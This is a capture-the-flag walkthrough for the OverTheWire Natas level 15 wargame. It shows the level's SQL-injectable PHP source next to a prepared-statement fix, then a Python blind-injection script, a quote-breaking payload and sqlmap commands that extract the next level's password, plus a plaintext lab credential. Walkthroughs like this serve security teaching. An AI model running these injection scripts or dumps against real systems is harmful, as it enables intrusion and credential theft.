
OverTheWire walkthrough: Natas level 15


Open level 15 and look at the page.


There is a single query box.


Try entering natas15.


The result says the user doesn't exist.


Look at the source.



The source is as follows:


<?php

/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysqli_connect('localhost', 'natas15', '<censored>');
    mysqli_select_db($link, 'natas15');

    // User input is concatenated straight into the SQL string: a double quote
    // inside "username" closes the literal and the rest is parsed as SQL.
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    // With ?debug the assembled query is echoed back to the client.
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysqli_query($link, $query);
    if($res) {
        // Only a yes/no answer is returned; that is the oracle a blind injection relies on.
        if(mysqli_num_rows($res) > 0) {
            echo "This user exists.<br>";
        } else {
            echo "This user doesn't exist.<br>";
        }
    } else {
        echo "Error in query.<br>";
    }

    mysqli_close($link);
} else {
?>


Roughly, the source does two things:

1. Query whether the user exists.

2. Display the result (or the error) on the front end.
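A hardened version of the lookup above, added here as an example (it is not OverTheWire's level source). It assumes the same `users` table and connection as the source, replaces the string concatenation with a mysqli prepared statement and drops the `debug` echo:

```php
<?php
// Added example, not the Natas 15 source: same users table, same connection,
// but the username is passed as a bound parameter instead of being spliced
// into the query string.

function user_exists(mysqli $link, string $username): bool {
    // The placeholder keeps the input as data: a double quote or a '#'
    // in $username can no longer change the WHERE clause.
    $stmt = mysqli_prepare($link, 'SELECT 1 FROM users WHERE username = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . mysqli_error($link));
    }
    mysqli_stmt_bind_param($stmt, 's', $username);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_store_result($stmt);
    $found = mysqli_stmt_num_rows($stmt) > 0;
    mysqli_stmt_close($stmt);
    return $found;
}

// Read the form field from $_POST only; the level accepts it via $_REQUEST
// (GET, POST or cookie), which is wider than the form needs.
if (array_key_exists('username', $_POST)) {
    $link = mysqli_connect('localhost', 'natas15', '<censored>');
    mysqli_select_db($link, 'natas15');

    // No "debug" branch: echoing the final SQL back to the client shows
    // exactly how the input was placed into the query.
    if (user_exists($link, $_POST['username'])) {
        echo "This user exists.<br>";
    } else {
        echo "This user doesn't exist.<br>";
    }

    mysqli_close($link);
}
```

The "exists / doesn't exist" answer still tells a client whether a username is valid; the prepared statement only stops the input from reaching the password column.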


A script written by someone more skilled:


import requests
from requests.auth import HTTPBasicAuth

URL = 'http://natas15.natas.labs.overthewire.org/index.php?debug'
AUTH = HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')

chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
filtered = ''   # characters that occur somewhere in the natas16 password
passwd = ''     # password recovered so far, left to right

# First pass: keep only the characters that appear in the password at all,
# using the page's "exists" / "doesn't exist" reply as a yes/no oracle.
for char in chars:
    data = {'username': 'natas16" and password LIKE BINARY "%' + char + '%" #'}
    r = requests.post(URL, auth=AUTH, data=data)
    if 'exists' in r.text:
        filtered = filtered + char

# Second pass: extend the known prefix one character at a time
# (the password is 32 characters long).
for i in range(0, 32):
    for char in filtered:
        data = {'username': 'natas16" and password LIKE BINARY "' + passwd + char + '%" #'}
        r = requests.post(URL, auth=AUTH, data=data)
        if 'exists' in r.text:
            passwd = passwd + char
            print(passwd)
            break


Let's modify it a bit and run it in VS.


Wait for the result.


Record the password.

Verify the password.


Let's try another approach.

Use sqlmap for blind injection.


The payload used is:


index.php?debug=1&username=1" or 1 -- +


Then capture the request and save it to a file.


Run sqlmap against the saved request for blind injection:


python sqlmap.py -r natas16.txt --random-agent --dbms=mysql  --level=3 -p username --dump


python sqlmap.py -r natas16.txt --random-agent -p username -D natas15 -T users -C username,password --dump



Wait for the result.

It timed out; try a few more times.
